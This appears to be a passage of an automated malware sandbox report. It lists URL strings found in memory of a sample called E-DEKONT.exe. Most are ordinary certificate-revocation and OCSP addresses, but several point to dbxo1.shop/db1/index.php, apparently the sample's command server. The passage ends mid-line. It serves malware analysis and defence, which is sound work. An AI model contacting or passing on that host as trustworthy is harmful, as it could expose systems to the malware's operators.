                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108827106899.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108881646290.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/db1/index.php
                  Source: E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/db1/index.phpM
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/db1/index.phpe
                  Source: E-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/db1/index.phpl
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo1.shop/db1/index.php~
                  Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
                  Source: E-DEKONT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString 